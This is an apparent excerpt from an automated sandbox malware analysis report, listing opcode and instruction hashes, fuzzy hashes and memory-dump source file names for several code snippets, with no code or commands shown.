                        • API String ID:
                        • Opcode ID: a208bc34579f2dada3276104405d34dfbbe1418ddad62ade4177d37af02f8b93
                        • Instruction ID: 4e05d4963ad9c0cf67446a186fe9598dab452a1d71497ca8db251d184eb3c7b3
                        • Opcode Fuzzy Hash: a208bc34579f2dada3276104405d34dfbbe1418ddad62ade4177d37af02f8b93
                        • Instruction Fuzzy Hash: F9028330B1890A4FE768FB2CD46567DB2D2FF88780F584579E00ED72DACE68AC428745
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81210b621ed9a912018a778a4ba8fbf1c3dff0f1a926fde0b7218cc16506a48c
                        • Instruction ID: ff934619ea1ecfeed57b387a457d7418390390943a6bcb16009698a8b4cd9e9a
                        • Opcode Fuzzy Hash: 81210b621ed9a912018a778a4ba8fbf1c3dff0f1a926fde0b7218cc16506a48c
                        • Instruction Fuzzy Hash: 7031583198D2850FD765B7346C138E67FA4EB42364F0E01ABE458CB4A3CA1CA687C766
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f24d0cc4518c2cd6064e1a030d0c338e7592307521aa0637ec8dff6e2db3b70c
                        • Instruction ID: 6300ba60eaa73fe4b1d23693a0ec94dddb1b33d99b3663db304291ca57b86a3a
                        • Opcode Fuzzy Hash: f24d0cc4518c2cd6064e1a030d0c338e7592307521aa0637ec8dff6e2db3b70c
                        • Instruction Fuzzy Hash: DA21363288E2D10FD356A3342C638F27FA4CF42265B0E01EBE098DB4A3C50D6687C766
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d353d4de20076d3b76816fef750b7bab1ef17adde7313d58abf46a67ee6193a
                        • Instruction ID: cb128b2959b684d5ea49d9f24c8b4c0e742c7a7c4739f0c275031cc5095db10b
                        • Opcode Fuzzy Hash: 7d353d4de20076d3b76816fef750b7bab1ef17adde7313d58abf46a67ee6193a
                        • Instruction Fuzzy Hash: 2B217132E1994A8FEB94FB68D8621FEBBB1FF54250F440076C409F3296DE682C418B84
                        Uniqueness

                        Uniqueness Score: -1.00%